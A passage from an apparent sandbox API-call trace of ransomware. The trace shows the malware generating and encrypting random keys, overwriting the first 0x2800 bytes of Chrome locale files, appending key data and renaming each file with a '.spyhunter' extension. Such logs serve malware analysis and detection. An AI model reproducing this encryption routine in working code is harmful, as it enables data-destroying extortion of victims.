pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak.spyhunter") returned 91 [0176.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pl.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pl.pak.spyhunter")) returned 1 [0176.110] GetProcessHeap () returned 0x2c0000 [0176.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.110] GetProcessHeap () returned 0x2c0000 [0176.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.110] GetProcessHeap () returned 0x2c0000 [0176.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecda00 | out: hHeap=0x2c0000) returned 1 [0176.110] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e458 | out: pbBuffer=0x248e458) returned 1 [0176.110] GetProcessHeap () returned 0x2c0000 [0176.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.110] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e450*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e450*=0x30) returned 1 [0176.110] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nb.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.111] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak") returned 81 [0176.111] StrStrW (lpFirst="nb.pak", lpSrch=".txt") returned 0x0 [0176.111] GetProcessHeap () returned 0x2c0000 [0176.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.111] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e414*=0x2800, lpOverlapped=0x0) returned 1 [0176.123] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.124] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e414*=0x2800, lpOverlapped=0x0) returned 1 [0176.124] GetProcessHeap () returned 0x2c0000 [0176.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.124] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.124] WriteFile (in: hFile=0xb0, lpBuffer=0x248e454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x248e454*, lpNumberOfBytesWritten=0x248e414*=0x4, lpOverlapped=0x0) returned 1 [0176.151] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e414*=0x30, lpOverlapped=0x0) returned 1 [0176.152] CloseHandle (hObject=0xb0) returned 1 [0176.283] GetProcessHeap () returned 0x2c0000 [0176.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.283] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak.spyhunter") returned 91 [0176.283] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nb.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\nb.pak.spyhunter")) returned 1 [0176.285] GetProcessHeap () returned 0x2c0000 [0176.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.285] GetProcessHeap () returned 0x2c0000 [0176.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.285] GetProcessHeap () returned 0x2c0000 [0176.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd820 | out: hHeap=0x2c0000) returned 1 [0176.285] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e458 | out: pbBuffer=0x248e458) returned 1 [0176.285] GetProcessHeap () returned 0x2c0000 [0176.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.285] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e450*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e450*=0x30) returned 1 [0176.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lt.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.286] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak") returned 81 [0176.286] StrStrW (lpFirst="lt.pak", lpSrch=".txt") returned 0x0 [0176.286] GetProcessHeap () returned 0x2c0000 [0176.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.286] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e414*=0x2800, lpOverlapped=0x0) returned 1 [0176.301] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.301] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e414*=0x2800, lpOverlapped=0x0) returned 1 [0176.302] GetProcessHeap () returned 0x2c0000 [0176.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.302] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.302] WriteFile (in: hFile=0xb0, lpBuffer=0x248e454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x248e454*, lpNumberOfBytesWritten=0x248e414*=0x4, lpOverlapped=0x0) returned 1 [0176.312] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e414, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e414*=0x30, lpOverlapped=0x0) returned 1 [0176.313] CloseHandle (hObject=0xb0) returned 1 [0176.314] GetProcessHeap () returned 0x2c0000 [0176.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.314] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak.spyhunter") returned 91 [0176.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lt.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lt.pak.spyhunter")) returned 1 [0176.315] GetProcessHeap () returned 0x2c0000 [0176.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.315] GetProcessHeap () returned 0x2c0000 [0176.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.315] GetProcessHeap () returned 0x2c0000 [0176.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd370 | out: hHeap=0x2c0000) returned 1 [0176.315] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e450 | out: pbBuffer=0x248e450) returned 1 [0176.315] GetProcessHeap () returned 0x2c0000 [0176.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.316] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e448*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e448*=0x30) returned 1 [0176.316] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ko.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.317] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak") returned 81 [0176.317] StrStrW (lpFirst="ko.pak", lpSrch=".txt") returned 0x0 [0176.317] GetProcessHeap () returned 0x2c0000 [0176.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.317] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e40c*=0x2800, lpOverlapped=0x0) returned 1 [0176.331] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.332] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e40c*=0x2800, lpOverlapped=0x0) returned 1 [0176.332] GetProcessHeap () returned 0x2c0000 [0176.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.332] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.332] WriteFile (in: hFile=0xb0, lpBuffer=0x248e44c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x248e44c*, lpNumberOfBytesWritten=0x248e40c*=0x4, lpOverlapped=0x0) returned 1 [0176.343] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e40c*=0x30, lpOverlapped=0x0) returned 1 [0176.343] CloseHandle (hObject=0xb0) returned 1 [0176.343] GetProcessHeap () returned 0x2c0000 [0176.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.343] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak.spyhunter") returned 91 [0176.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ko.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ko.pak.spyhunter")) returned 1 [0176.345] GetProcessHeap () returned 0x2c0000 [0176.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.345] GetProcessHeap () returned 0x2c0000 [0176.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.345] GetProcessHeap () returned 0x2c0000 [0176.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd280 | out: hHeap=0x2c0000) returned 1 [0176.345] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e450 | out: pbBuffer=0x248e450) returned 1 [0176.345] GetProcessHeap () returned 0x2c0000 [0176.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.345] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e448*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e448*=0x30) returned 1 [0176.345] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ja.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.346] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak") returned 81 [0176.346] StrStrW (lpFirst="ja.pak", lpSrch=".txt") returned 0x0 [0176.346] GetProcessHeap () returned 0x2c0000 [0176.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.346] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e40c*=0x2800, lpOverlapped=0x0) returned 1 [0176.367] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.367] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e40c*=0x2800, lpOverlapped=0x0) returned 1 [0176.367] GetProcessHeap () returned 0x2c0000 [0176.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.367] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.368] WriteFile (in: hFile=0xb0, lpBuffer=0x248e44c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x248e44c*, lpNumberOfBytesWritten=0x248e40c*=0x4, lpOverlapped=0x0) returned 1 [0176.377] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e40c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e40c*=0x30, lpOverlapped=0x0) returned 1 [0176.377] CloseHandle (hObject=0xb0) returned 1 [0176.378] GetProcessHeap () returned 0x2c0000 [0176.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.378] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak.spyhunter") returned 91 [0176.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ja.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ja.pak.spyhunter")) returned 1 [0176.380] GetProcessHeap () returned 0x2c0000 [0176.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.380] GetProcessHeap () returned 0x2c0000 [0176.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.380] GetProcessHeap () returned 0x2c0000 [0176.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd0a0 | out: hHeap=0x2c0000) returned 1 [0176.380] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e448 | out: pbBuffer=0x248e448) returned 1 [0176.380] GetProcessHeap () returned 0x2c0000 [0176.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.380] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e440*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e440*=0x30) returned 1 [0176.380] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hr.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.382] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak") returned 81 [0176.382] StrStrW (lpFirst="hr.pak", lpSrch=".txt") returned 0x0 [0176.382] GetProcessHeap () returned 0x2c0000 [0176.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.382] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e404*=0x2800, lpOverlapped=0x0) returned 1 [0176.392] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.392] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e404*=0x2800, lpOverlapped=0x0) returned 1 [0176.392] GetProcessHeap () returned 0x2c0000 [0176.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.392] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.392] WriteFile (in: hFile=0xb0, lpBuffer=0x248e444*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x248e444*, lpNumberOfBytesWritten=0x248e404*=0x4, lpOverlapped=0x0) returned 1 [0176.402] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e404*=0x30, lpOverlapped=0x0) returned 1 [0176.402] CloseHandle (hObject=0xb0) returned 1 [0176.402] GetProcessHeap () returned 0x2c0000 [0176.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0176.403] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak.spyhunter") returned 91 [0176.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hr.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hr.pak.spyhunter")) returned 1 [0176.404] GetProcessHeap () returned 0x2c0000 [0176.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0176.404] GetProcessHeap () returned 0x2c0000 [0176.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.404] GetProcessHeap () returned 0x2c0000 [0176.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eccce0 | out: hHeap=0x2c0000) returned 1 [0176.404] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e448 | out: pbBuffer=0x248e448) returned 1 [0176.404] GetProcessHeap () returned 0x2c0000 [0176.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.404] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e440*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e440*=0x30) returned 1 [0176.404] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\he.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.405] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak") returned 81 [0176.405] StrStrW (lpFirst="he.pak", lpSrch=".txt") returned 0x0 [0176.405] GetProcessHeap () returned 0x2c0000 [0176.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.405] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e404*=0x2800, lpOverlapped=0x0) returned 1 [0176.407] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.407] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e404*=0x2800, lpOverlapped=0x0) returned 1 [0176.407] GetProcessHeap () returned 0x2c0000 [0176.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.407] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.407] WriteFile (in: hFile=0xb0, lpBuffer=0x248e444*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x248e444*, lpNumberOfBytesWritten=0x248e404*=0x4, lpOverlapped=0x0) returned 1 [0176.428] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e404, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e404*=0x30, lpOverlapped=0x0) returned 1 [0176.428] CloseHandle (hObject=0xb0) returned 1 [0176.431] GetProcessHeap () returned 0x2c0000 [0176.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.431] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak.spyhunter") returned 91 [0176.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\he.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\he.pak.spyhunter")) returned 1 [0176.432] GetProcessHeap () returned 0x2c0000 [0176.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.432] GetProcessHeap () returned 0x2c0000 [0176.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.432] GetProcessHeap () returned 0x2c0000 [0176.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eccb00 | out: hHeap=0x2c0000) returned 1 [0176.433] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e440 | out: pbBuffer=0x248e440) returned 1 [0176.433] GetProcessHeap () returned 0x2c0000 [0176.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.433] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e438*=0x20, dwBufLen=0x30 | out: 